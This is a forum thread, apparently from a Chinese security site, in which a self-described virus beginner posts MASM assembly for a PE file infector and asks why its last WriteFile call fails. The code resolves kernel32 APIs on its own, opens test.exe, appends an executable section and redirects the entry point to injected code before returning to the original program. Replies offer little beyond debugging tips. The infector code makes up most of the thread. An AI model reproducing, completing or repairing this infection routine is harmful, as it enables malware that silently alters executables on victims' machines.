首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 经典问答
    3. 发新帖
刚学病毒求助
发表于: 2010-4-15 22:14 3940

刚学病毒求助

御剑 活跃值
2010-4-15 22:14
3940
.386
.model flat,stdcall
option casemap:none

include include\windows.inc

.code
Main:
mov edi,[esp]
and edi,0ffff0000h
GetKernelBase:
cmp word ptr [edi],IMAGE_DOS_SIGNATURE
je TestPe
TestAddress:
dec edi
xor di,di
cmp edi,070000000h
jnb GetKernelBase
jmp Exit

TestPe:
mov esi,edi
add esi,[esi + IMAGE_DOS_HEADER.e_lfanew]
cmp word ptr [esi],IMAGE_NT_SIGNATURE
je GetApi
jmp TestAddress

GetApi:
mov aKernelBase,edi
assume esi:ptr IMAGE_NT_HEADERS
mov esi,[esi].OptionalHeader.DataDirectory.VirtualAddress
add esi,aKernelBase
assume esi:ptr IMAGE_EXPORT_DIRECTORY
mov ebx,[esi].AddressOfNames
add ebx,aKernelBase
xor edx,edx
CheckName:
push esi
mov edi,[ebx]
add edi,aKernelBase
lea eax,szGetProcAddress
mov esi,eax
mov ecx,15
cld
repz cmpsb
je FindIndex
pop esi
add ebx,4
inc edx
cmp edx,[esi].NumberOfNames
jna CheckName
jmp Exit

FindIndex:
pop esi
sub ebx,[esi].AddressOfNames
sub ebx,aKernelBase
shr ebx,1
add ebx,[esi].AddressOfNameOrdinals
add ebx,aKernelBase
movzx eax,word ptr [ebx]
shl eax,2
add eax,[esi].AddressOfFunctions
add eax,aKernelBase
mov eax,[eax]
add eax,aKernelBase
mov aGetProcAddress,eax

lea eax,szLoadLibraryA
push eax
push aKernelBase
call aGetProcAddress
mov aLoadLibraryA,eax

lea eax,szExitProcess
push eax
push aKernelBase
call aGetProcAddress
mov aExitProcess,eax

lea eax,szWriteFile
push eax
push aKernelBase
call aGetProcAddress
mov aWriteFile,eax

lea eax,szReadFile
push eax
push aKernelBase
call aGetProcAddress
mov aReadFile,eax

lea eax,szCreateFile
push eax
push aKernelBase
call aGetProcAddress
mov aCreateFile,eax

lea eax,szSetFilePointer
push eax
push aKernelBase
call aGetProcAddress
mov aSetFilePointer,eax

lea eax,szCloseHandle
push eax
push aKernelBase
call aGetProcAddress
mov aCloseHandle,eax

lea eax,szUser32
push eax
call aLoadLibraryA

lea ebx,szMessageBoxA
push ebx
push eax
call aGetProcAddress
mov aMessageBoxA,eax

push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ or FILE_SHARE_WRITE
push GENERIC_READ or GENERIC_WRITE
lea eax,szFileName
push eax
call aCreateFile
cmp eax,INVALID_HANDLE_VALUE
je Exit
mov hFile,eax

push FILE_BEGIN
push 0
push 3ch
push hFile
call aSetFilePointer

push 0
lea eax,dwFileReadWritten
push eax
push 4
lea eax,dwPE_Header_OffSet
push eax
push hFile
call aReadFile

push FILE_BEGIN
push 0
push dwPE_Header_OffSet
push hFile
call aSetFilePointer

push 0
lea eax,dwFileReadWritten
push eax
mov eax,sizeof IMAGE_NT_HEADERS
add eax,sizeof IMAGE_SECTION_HEADER
push eax
lea eax,PE_Header
push eax
push hFile
call aReadFile

cmp [PE_Header.Signature],IMAGE_NT_SIGNATURE
jne Exit

movzx eax,[PE_Header.FileHeader.NumberOfSections]
mov ecx,28h
mul ecx
add eax,dwPE_Header_OffSet
add eax,18h
movzx ecx,[PE_Header.FileHeader.SizeOfOptionalHeader]
add eax,ecx
add eax,28h
cmp eax,[PE_Header.OptionalHeader.SizeOfHeaders]
ja Exit

mov eax,[PE_Header.OptionalHeader.AddressOfEntryPoint]
mov Old_AddressOfEntryPoint,eax
mov eax,[PE_Header.OptionalHeader.ImageBase]
mov Old_ImageBase,eax

movzx eax,[PE_Header.FileHeader.NumberOfSections]
mov ecx,28h
mul ecx
add eax,4h
add eax,dwPE_Header_OffSet
add eax,sizeof IMAGE_FILE_HEADER
add eax,sizeof IMAGE_OPTIONAL_HEADER
mov dwMySectionOffSet,eax

mov dword ptr [My_Section.Name1],"CL."
mov [My_Section.Misc.VirtualSize],offset VEnd-offset VStart
push [PE_Header.OptionalHeader.SizeOfImage]
pop [My_Section.VirtualAddress]
mov eax,[My_Section.Misc.VirtualSize]
mov ecx,[PE_Header.OptionalHeader.FileAlignment]
cdq
div ecx
inc eax
mul ecx
mov [My_Section.SizeOfRawData],eax
mov eax,dwMySectionOffSet
sub eax,18h
push FILE_BEGIN
push 0
push eax
push hFile
call aSetFilePointer
push 0
lea eax,dwFileReadWritten
push eax
push 4
lea eax,dwLastSection_SizeOfRawData
push eax
push hFile
call aReadFile
push 0
lea eax,dwFileReadWritten
push eax
push 4
lea eax,dwLastSection_PointerToRawData
push eax
push hFile
call aReadFile
mov eax,dwLastSection_SizeOfRawData
add eax,dwLastSection_PointerToRawData
mov [My_Section.PointerToRawData],eax
mov [My_Section.PointerToRelocations],0h
mov [My_Section.PointerToLinenumbers],0h
mov [My_Section.NumberOfRelocations],0h
mov [My_Section.NumberOfLinenumbers],0h
mov [My_Section.Characteristics],0E0000020h

push FILE_BEGIN
push 0
push dwMySectionOffSet
push hFile
call aSetFilePointer
push 0
lea eax,dwFileReadWritten
push eax
push sizeof IMAGE_SECTION_HEADER
lea eax,My_Section
push eax
push hFile
call aWriteFile
cmp eax,0
je Exit

push FILE_END
push 0
push 0
push hFile
call aSetFilePointer
push 0
lea eax,dwFileReadWritten
push eax
push [My_Section.SizeOfRawData]
lea eax,VStart
push eax
push hFile
call aWriteFile
cmp eax,0
je Exit

inc [PE_Header.FileHeader.NumberOfSections]
mov eax,[My_Section.Misc.VirtualSize]
mov ecx,[PE_Header.OptionalHeader.SectionAlignment]
cdq
div ecx
inc eax
mul ecx
add eax,[PE_Header.OptionalHeader.SizeOfImage]
mov [PE_Header.OptionalHeader.SizeOfImage],eax
mov eax,[My_Section.VirtualAddress]
mov [PE_Header.OptionalHeader.AddressOfEntryPoint],eax
push FILE_BEGIN
push 0
push dwPE_Header_OffSet
push hFile
call aSetFilePointer
push 0
lea eax,dwFileReadWritten
push eax
push sizeof IMAGE_NT_HEADERS
push PE_Header
push hFile
call aWriteFile  \\这里老是写入失败,返回EAX=12FF9A
push hFile
call aCloseHandle

VStart:
call Relocate
Relocate:
pop ebp
sub ebp,offset Relocate

push MB_OK or MB_ICONINFORMATION
lea eax,szMsg[ebp]
push eax
lea eax,szMsg[ebp]
push eax
push 0
call aMessageBoxA[ebp]

mov eax,Old_ImageBase[ebp]
add eax,Old_AddressOfEntryPoint[ebp]
push eax
ret
szMsg db "查到成功!",0
aMessageBoxA        dd  0
Old_ImageBase dd 0
Old_AddressOfEntryPoint dd 0
VEnd:
Exit:
push MB_OK or MB_ICONINFORMATION
lea eax,szMsg1
push eax
lea eax,szMsg1
push eax
push 0
call aMessageBoxA
push 0
call aExitProcess
ret

szLoadLibraryA db "LoadLibraryA",0
aLoadLibraryA dd 0

szGetProcAddress db "GetProcAddress",0
aGetProcAddress dd 0

szCreateFile db "CreateFileA",0
aCreateFile dd 0

szReadFile db "ReadFile",0
aReadFile dd 0

szWriteFile db "WriteFile",0
aWriteFile dd 0

szSetFilePointer db "SetFilePointer",0
aSetFilePointer dd 0

szCloseHandle db "CloseHandle",0
aCloseHandle dd 0

szExitProcess       db  "ExitProcess", 0
aExitProcess        dd  0

szMessageBoxA       db  "MessageBoxA", 0

PE_Header IMAGE_NT_HEADERS <0>
My_Section IMAGE_SECTION_HEADER <>

szMsg1 db "出错!",0
szUser32 db  "user32.dll", 0
szFileName db "test.exe",0

hFile dd 0
aKernelBase dd 0
dwPE_Header_OffSet dd 0
dwFileReadWritten dd 0
dwMySectionOffSet dd 0
dwLastSection_SizeOfRawData dd 0
dwLastSection_PointerToRawData dd 0
end Main

我刚学病毒,抄了别人的代码,可是运行老有问题,请各位大哥大姐帮忙处理下,感觉就是最后一个写入那里有问题。

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (8)
ipandora
雪    币: 37
活跃值: (20)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
我也刚学习病毒,支持你一下
2010-5-8 15:34
0
japfeng
雪    币: 5
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
虽然不知道你的意思是什么,但是我先看看这段代码!
2010-5-8 19:56
0
guanghuisy
雪    币: 355
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
看不懂 来学习的
2010-5-8 19:58
0
pqqop
雪    币: 21
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
最近在学C++,学习一下!
2010-5-8 21:21
0
xieziyu
雪    币: 234
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
晕,我都看不懂。。。。。
2010-5-9 12:49
0
千里之外
雪    币: 217
活跃值: (68)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
私信
7
Return Value
If the function succeeds, the return value is nonzero.

If the function fails, the return value is zero. To get extended error information, call GetLastError.

about WriteFile
2010-5-10 15:40
0
ctaotao
雪    币: 324
活跃值: (113)
能力值: ( LV15,RANK:280 )
在线值:
发帖
回帖
粉丝
私信
8
你最好单步调试,如果WriteFile出错话,用GetLastError获取错误代码,再到msdn中错误代码是什么意思。
另外如果是初学,建议还是使用vc写,关键部分可以用内联汇编。

2010-5-18 14:04
0
生命SM
雪    币: 203
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
我也是来学习的,病毒是我希望的哦
2010-5-19 21:26
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//